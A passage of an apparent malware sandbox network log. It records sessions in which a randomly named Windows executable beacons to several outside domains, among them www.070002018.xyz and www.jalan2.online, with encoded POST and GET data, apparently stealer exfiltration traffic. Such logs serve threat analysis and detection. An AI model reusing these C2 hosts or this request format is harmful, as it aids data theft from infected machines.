                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6NVpdLF=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrWZvRz659dWh9F4TBV1031x6bEqu3dQ==&_jVx=rlV0_TQ81"}</script></head></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.10 | 49994 | 161.97.142.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:53.878459930 CET | 619 | OUT | POST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=VyR7xEiQABko0VBoUjyiu47MXs3tB6HsNr8Og9ToyHrG6nMo6/aeuvV9KYdN/XdBMZ2sLtSrcrU7uOH7Qm97/Yde+VEYPTUd7FNKvYdC15LHeuhLpPFlErWsmRHWN6/Z51fznt+fGZJNdyGVLmW+Ri5kbdyDuyx99mYf9C8qnxoyKO1gvIM/YGgwGDPQ
                                                                              Dec 2, 2024 14:44:55.102485895 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:44:54 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Dec 2, 2024 14:44:55.102509975 CET | 370 | IN


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              18 | 192.168.2.10 | 49995 | 161.97.142.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:56.539814949 CET | 643 | OUT | POST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=VyR7xEiQABko00xoRAai/I7NYM3tYqGnNrwOg8mvy0PG0lUo79+e+/V9C4cFy3deMZyeLparcrA7uKD7RQ145YdYnFEaLTUd7FNKvYJ719nHZd5LouFmNLWrnRHWJ6+e51fRnof6GbxNdz2VLSKhYi5iGNzLoSoJ9m87w0gq7T8AEPIn+ZtoLx8+IF66jmTGsnZIZjrPZAcI4BymWA==
                                                                              Dec 2, 2024 14:44:57.858855009 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:44:57 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Dec 2, 2024 14:44:57.858875036 CET | 370 | IN | [continuation of the gzip-compressed response body]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              19 | 192.168.2.10 | 49996 | 161.97.142.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:44:59.225997925 CET | 1656 | OUT | POST /6m2n/ HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.070002018.xyz
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.070002018.xyz/6m2n/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:00.539998055 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:00 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: W/"66cce1df-b96"
                                                                              Content-Encoding: gzip
                                                                              Dec 2, 2024 14:45:00.540040970 CET | 370 | IN | [continuation of the gzip-compressed response body]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              20 | 192.168.2.10 | 49997 | 161.97.142.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:01.880819082 CET | 356 | OUT | GET /6m2n/?6NVpdLF=Yw5byyKwEzNx0WEyNQXxwK69B8+8B5LUHYwp2f+G51jE3kEn7LG6s/p7OKNy20MANuawYrGFRZxpwvPhYVF0ur9kqRkxGnQ62VRV775xzcXmQMlZyg==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.070002018.xyz
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:03.208888054 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:03 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Content-Length: 2966
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              ETag: "66cce1df-b96"
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                              Dec 2, 2024 14:45:03.208905935 CET | 1236 | IN | Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                                              Dec 2, 2024 14:45:03.208923101 CET | 698 | IN | Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              21 | 192.168.2.10 | 49998 | 35.220.176.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:09.718020916 CET | 628 | OUT | POST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:11.207480907 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:10 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              22 | 192.168.2.10 | 49999 | 35.220.176.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:12.383399963 CET | 652 | OUT | POST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:13.911417961 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:13 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              23 | 192.168.2.10 | 50000 | 35.220.176.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:15.053141117 CET | 1665 | OUT | POST /7yhf/ HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.bienmaigrir.info
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.bienmaigrir.info/7yhf/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:16.625010967 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              24 | 192.168.2.10 | 50001 | 35.220.176.144 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:17.706048965 CET | 359 | OUT | GET /7yhf/?_jVx=rlV0_TQ81&6NVpdLF=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGro8YtWCJNiZpBxbyycKP3y6+8bNDuvw== HTTP/1.1
                                                                              Host: www.bienmaigrir.info
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:19.282972097 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 02 Dec 2024 13:45:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 548
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              25 | 192.168.2.10 | 50002 | 101.35.209.183 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:25.636650085 CET | 619 | OUT | POST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeJOlMo9XIKjtmAgmgUbb3c/2mKmef
                                                                              Dec 2, 2024 14:45:27.169576883 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:26 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              26 | 192.168.2.10 | 50003 | 101.35.209.183 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:28.304949045 CET | 643 | OUT | POST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPIqoEgr1UbKXaDSnAx5+YkACJot6cg==
                                                                              Dec 2, 2024 14:45:29.927292109 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:29 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              27 | 192.168.2.10 | 50004 | 101.35.209.183 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:30.982059956 CET | 1656 | OUT | POST /wu7k/ HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.yc791022.asia
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.yc791022.asia/wu7k/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              28 | 192.168.2.10 | 50005 | 101.35.209.183 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:33.646073103 CET | 356 | OUT | GET /wu7k/?6NVpdLF=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP+ofPy3OtxFAtreRUZwpBdqa4QiZw9w==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.yc791022.asia
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:35.283304930 CET | 427 | IN | HTTP/1.1 404 Not Found
                                                                              Date: Mon, 02 Dec 2024 13:45:35 GMT
                                                                              Server: Apache
                                                                              Content-Length: 263
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              29 | 192.168.2.10 | 50006 | 108.181.189.7 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:40.854090929 CET | 619 | OUT | POST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk2e9Db0f0dDBMQILTwhvnQ/S6z4ho
                                                                              Dec 2, 2024 14:45:42.241408110 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:42 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Dec 2, 2024 14:45:42.241652966 CET | 713 | IN | [gzip-compressed chunked response body]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              30 | 192.168.2.10 | 50007 | 108.181.189.7 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:43.522030115 CET | 643 | OUT | POST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Ascii: 6NVpdLF=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDIO09+UC8cNEx2KHWE/XJgqBLcfKVQ==
                                                                              Dec 2, 2024 14:45:44.717104912 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:44 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Dec 2, 2024 14:45:44.717664957 CET | 713 | IN | [gzip-compressed chunked response body]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              31 | 192.168.2.10 | 50008 | 108.181.189.7 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:46.182585001 CET | 1656 | OUT | POST /ykgd/ HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.jalan2.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.jalan2.online/ykgd/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:47.588088036 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              date: Mon, 02 Dec 2024 13:45:47 GMT
                                                                              server: LiteSpeed
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              transfer-encoding: chunked
                                                                              connection: close
                                                                              Dec 2, 2024 14:45:47.588228941 CET | 713 | IN | [gzip-compressed response body omitted]


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              32 | 192.168.2.10 | 50009 | 108.181.189.7 | 80 | 6680 | C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Dec 2, 2024 14:45:48.849193096 CET | 356 | OUT | GET /ykgd/?_jVx=rlV0_TQ81&6NVpdLF=9oLAy+SEg8JXgI2TBYJ+cgbVH4pSJ447WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/wtvWbtjylB0D75gbWHC72kMsIY/h9A== HTTP/1.1
                                                                              Host: www.jalan2.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:45:49.996381998 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                              content-type: text/html
                                                                              cache-control: private, no-cache, max-age=0
                                                                              pragma: no-cache
                                                                              content-length: 1249
                                                                              date: Mon, 02 Dec 2024 13:45:49 GMT
                                                                              server: LiteSpeed
                                                                              connection: close
                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                                              Dec 2, 2024 14:45:49.996412992 CET | 224 | IN
                                                                              Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
